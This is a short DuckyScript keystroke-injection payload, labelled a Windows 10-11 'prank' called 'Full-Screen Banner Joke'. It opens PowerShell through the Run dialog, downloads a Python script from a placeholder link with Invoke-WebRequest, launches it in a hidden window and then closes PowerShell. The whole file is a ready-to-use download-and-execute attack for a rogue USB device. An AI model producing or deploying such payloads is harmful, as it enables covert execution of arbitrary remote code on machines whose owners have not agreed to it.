* ############################################
* #                                          |
* # Title        : Full-Screen Banner Joke   |
* # Author       : Aleff                     |
* # Version      : 1.0                       |
* # Category     : Prank                     |
* # Target       : Windows 10-11             |
* #                                          |
* ############################################


* Requirements:
*     - Internet Connection
*     - Python installed
*     - ExecutionPolicy Bypass


DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500

* REQUIRED - Set your Python script link
STRING Invoke-WebRequest -Uri "SCRIPT-PY-LINK" -OutFile "script.py"
ENTER
DELAY 500

STRING Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
ENTER
DELAY 1000
ALT F4
